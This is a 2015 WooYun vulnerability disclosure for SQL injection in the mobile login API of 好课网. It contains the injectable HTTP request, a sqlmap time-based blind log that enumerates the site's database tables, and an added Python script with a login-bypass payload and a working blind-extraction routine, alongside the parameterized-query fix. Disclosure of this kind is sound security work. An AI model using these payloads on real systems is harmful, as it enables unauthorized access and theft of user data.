WooYun vulnerability report

Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0146712

Title: SQL injection in the mobile login API of 好课网 (Haoke Wang)

Vendor: 好课网

Author: 三浪兄

Submitted: 2015-10-14 16:20

Fixed: 2015-10-15 10:38

Published: 2015-10-15 10:38

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-14: Details sent to the vendor, awaiting vendor response
2015-10-14: Vendor confirmed; details visible to the vendor only
2015-10-15: Vendor fixed the issue and chose to publish; details now public

Brief description:

Why is it always a small vendor? Too tired to care.

Details:

POST /user/login_ajax HTTP/1.1
Host: m.class.cn
Proxy-Connection: keep-alive
Content-Length: 44
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://m.class.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.class.cn/user/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,pl;q=0.4,zh-TW;q=0.2
Cookie: RESET_PASSWD_COOKIE=1852; PHPSESSID=n9gpssph9h8006aonjf27e2ju0; CNZZDATA5333700=cnzz_eid%3D1683793653-1444736309-null%26ntime%3D1444736309; Hm_lvt_5907fb81dedac17075ae6def57dc2989=1444738730,1444738958,1444738989,1444739041; Hm_lpvt_5907fb81dedac17075ae6def57dc2989=1444740248
email=admin%40123.com&passwd=admin&act=login


The email parameter is injectable. The endpoint gives no direct error or content signal, so the injection was exploited as time-based blind, as the sqlmap output below shows; the cookie in the request is the author's own session.
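As an added illustration, not code from the original report or from 好课网, here is a constructed Python model of the flaw: a login query assembled by string concatenation, the parameterized fix, and a blind-inference loop that uses the login verdict as a true/false oracle to recover table names one character at a time. That inference is the same one sqlmap performed in the proof (there it used response delay as the oracle instead of a login success, the loop is otherwise identical). The table and column names, the sample rows and the login logic are assumptions.

```python
"""Constructed model of a login endpoint that builds SQL by string
concatenation, the parameterized fix, and blind extraction through it.

Hypothetical throughout: table/column names, rows and logic are assumptions,
not the site's real code. Uses an in-memory SQLite database so it runs offline."""
import sqlite3

# Constructed sample schema: two tables named in the style of the sqlmap output.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE cdb_members (uid INTEGER, email TEXT, passwd TEXT)")
conn.execute("INSERT INTO cdb_members VALUES (1, '[email protected]', 's3cret-hash')")
conn.execute("CREATE TABLE cdb_sessions (sid TEXT)")
conn.commit()


def login_vulnerable(email: str, passwd: str):
    """The flaw: user input is pasted straight into the SQL text, so a quote
    in `email` ends the literal and the rest of the input becomes SQL."""
    sql = ("SELECT uid FROM cdb_members WHERE email = '%s' AND passwd = '%s'"
           % (email, passwd))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(email: str, passwd: str):
    """The fix: placeholders. The values travel separately from the query
    text, so no quote in the input can change the query structure."""
    sql = "SELECT uid FROM cdb_members WHERE email = ? AND passwd = ?"
    row = conn.execute(sql, (email, passwd)).fetchone()
    return row[0] if row else None


def oracle(condition: str) -> bool:
    """Boolean oracle on the vulnerable endpoint: the injected OR makes the
    login succeed exactly when `condition` is true; the trailing '--'
    comments out the real password check."""
    payload = "x' OR (%s) -- " % condition
    return login_vulnerable(payload, "irrelevant") is not None


def extract(subquery: str, max_len: int = 64) -> str:
    """Recover the string value of `subquery` one character at a time,
    binary-searching the character code (about 7 requests per character
    instead of one per candidate character)."""
    out = ""
    for pos in range(1, max_len + 1):
        # stop once the string has no character at this position
        if not oracle("length((%s)) >= %d" % (subquery, pos)):
            break
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def list_tables(limit: int = 10):
    """Enumerate table names through the oracle, like sqlmap's
    'fetching tables for database' step (SQLite catalog here, not MySQL)."""
    names = []
    for i in range(limit):
        name = extract("SELECT name FROM sqlite_master WHERE type='table' "
                       "ORDER BY name LIMIT 1 OFFSET %d" % i)
        if not name:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    bypass = "' OR '1'='1' -- "
    print("vulnerable login with bypass payload ->", login_vulnerable(bypass, "x"))
    print("fixed login with same payload       ->", login_fixed(bypass, "x"))
    for name in list_tables():
        print("retrieved:", name)
```

The fixed function is the whole remediation: the WHERE clause never sees raw input as SQL text, so both the authentication bypass and the blind extraction loop stop working against it.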

Proof:

[Screenshot: 屏幕快照 2015-10-14 下午1.28.39.png]


[12:07:30] [INFO] fetching tables for database: 'bbsnew'
[12:07:30] [INFO] fetching number of tables for database 'bbsnew'
[12:07:30] [INFO] resumed: 151
[12:07:30] [INFO] resuming partial value: cd
[12:07:30] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:07:30] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:07:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[12:07:56] [INFO] adjusting time delay to 1 second due to good response times
b_access
[12:08:24] [INFO] retrieved: cdb_activities
[12:09:07] [INFO] retrieved: cdb_activityapplies
[12:09:58] [INFO] retrieved: cdb_addons
[12:10:29] [INFO] retrieved: cdb_adminactions
[12:11:21] [INFO] retrieved: cdb_admincustom
[12:12:00] [INFO] retrieved: cdb_admingroups
[12:12:41] [INFO] retrieved: cdb_adminnotes
[12:13:16] [INFO] retrieved: cdb_adminsessions
[12:14:04] [INFO] retrieved: cdb_advertisements
[12:15:09] [INFO] retrieved: cdb_announcements
[12:16:17] [INFO] retrieved: cdb_attachmentf
[12:17:24] [ERROR] invalid character detected. retrying..
[12:17:24] [WARNING] increasing time delay to 2 seconds
ields
[12:18:06] [INFO] retrieved: cdb_attachments
[12:18:45] [INFO] retrieved: cdb_attachpaymentlog
[12:20:44] [INFO] retrieved: cdb_attachtypes
[12:21:53] [INFO] retrieved: cdb_banned
[12:22:50] [INFO] retrieved: cdb_bbcodes
[12:23:51] [INFO] retrieved: cdb_caches
[12:24:45] [INFO] retrieved: cdb_chance
[12:25:38] [INFO] retrieved: cdb_creditslog
[12:27:11] [INFO] retrieved: cdb_crons
[12:27:56] [INFO] retrieved: cdb_debateposts
[12:29:43] [INFO] retrieved: cdb_debates
[12:30:13] [INFO] retrieved: cdb_dps_sign
[12:31:32] [INFO] retrieved: cdb_dps_signset
[12:32:25] [INFO] retrieved: cdb_failedlogins
[12:34:17] [INFO] retrieved: cdb_faqs
[12:34:46] [INFO] retrieved: cdb_favoritefor
[12:36:24] [INFO] adjusting time delay to 1 second due to good response times
ums
[12:36:38] [INFO] retrieved: cdb_favorites
[12:36:57] [INFO] retrieved: cdb_favoritethreads
[12:37:43] [INFO] retrieved: cdb_feeds
[12:38:06] [INFO] retrieved: cdb_forumfields
[12:38:59] [INFO] retrieved: cdb_forumlinks
[12:39:34] [INFO] retrieved: cdb_forumrecommend
[12:40:25] [INFO] retrieved: cdb_forums
[12:40:40] [INFO] retrieved: cdb_imagetypes
[12:41:30] [INFO] retrieved: cdb_invites
[12:42:05] [INFO] retrieved: cdb_itempool
[12:42:49] [INFO] retrieved: cdb_magiclog
[12:43:29] [INFO] retrieved: cdb_magicmarket
[12:44:05] [INFO] retrieved: cdb_magics
[12:44:20] [INFO] retrieved: cdb_medallog
[12:44:58] [INFO] retrieved: cdb_medals
[12:45:13] [INFO] retrieved: cdb_memberfields
[12:46:03] [INFO] retrieved: cdb_membermagics
[12:46:39] [INFO] retrieved: cdb_memberrecommend
[12:47:31] [INFO] retrieved: cdb_members
[12:47:47] [INFO] retrieved: cdb_membersbind
[12:48:18] [INFO] retrieved: cdb_memberspaces
[12:48:52] [INFO] retrieved: cdb_moderators
[12:49:39] [INFO] retrieved: cdb_modworks
[12:50:13] [INFO] retrieved: cdb_mytasks
[12:50:46] [INFO] retrieved: cdb_navs
[12:51:09] [INFO] retrieved: cdb_onlinelist
[12:52:03] [INFO] retrieved: cdb_onlinetime
[12:52:32] [INFO] retrieved: cdb_orders
[12:53:00] [INFO] retrieved: cdb_paymentlog
[12:53:55] [INFO] retrieved: cdb_pluginhooks
[12:54:51] [INFO] retrieved: cdb_plugins
[12:55:07] [INFO] retrieved: cdb_pluginvars
[12:55:36] [INFO] retrieved: cdb_polloptions
[12:56:37] [INFO] retrieved: cdb_polls
[12:56:52] [INFO] retrieved: cdb_postposition
[12:57:51] [INFO] retrieved: cdb_posts
[12:58:05] [INFO] retrieved: cdb_posts_bak121114
[12:58:50] [INFO] retrieved: cdb_prizer
[12:59:18] [INFO] retrieved: cdb_profilefields
[13:00:15] [INFO] retrieved: cdb_projects
[13:00:46] [INFO] retrieved: cdb_promotions
[13:01:30] [INFO] retrieved: cdb_prompt
[13:01:51] [INFO] retrieved: cdb_promptmsgs
[13:02:21] [INFO] retrieved: cdb_prompttype
[13:02:54] [INFO] retrieved: cdb_purchce
[13:03:25] [INFO] retrieved: cdb_ranks
[13:03:52] [INFO] retrieved: cdb_ratelog
[13:04:24] [INFO] retrieved: cdb_regips
[13:04:54] [INFO] retrieved: cdb_relatedthreads
[13:05:55] [INFO] retrieved: cdb_reportlog
[13:06:41] [INFO] retrieved: cdb_request
[13:07:11] [INFO] retrieved: cdb_rewardlog
[13:07:52] [INFO] retrieved: cdb_rsscaches
[13:08:31] [INFO] retrieved: cdb_searchindex
[13:09:26] [INFO] retrieved: cdb_sessions
[13:10:02] [INFO] retrieved: cdb_settings
[13:10:39] [INFO] retrieved: cdb_smilies
[13:11:10] [INFO] retrieved: cdb_spacecaches
[13:11:56] [INFO] retrieved: cdb_stats
[13:12:21] [INFO] retrieved: cdb_statvars
[13:12:47] [INFO] retrieved: cdb_styles
[13:13:13] [INFO] retrieved: cdb_stylevars
[13:13:41] [INFO] retrieved: cdb_tags
[13:14:03] [INFO] retrieved: ^C


[Screenshot: 屏幕快照 2015-10-14 下午3.47.55.png]


Suggested fix:

Filter the input; better, pass email and passwd to the login query as bound parameters (prepared statements) rather than concatenating them into the SQL string.

Copyright: please credit 三浪兄@乌云 when reposting.


Responses

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-10-14 16:30

Vendor reply:

Thanks.

Latest status:

2015-10-15: Fixed.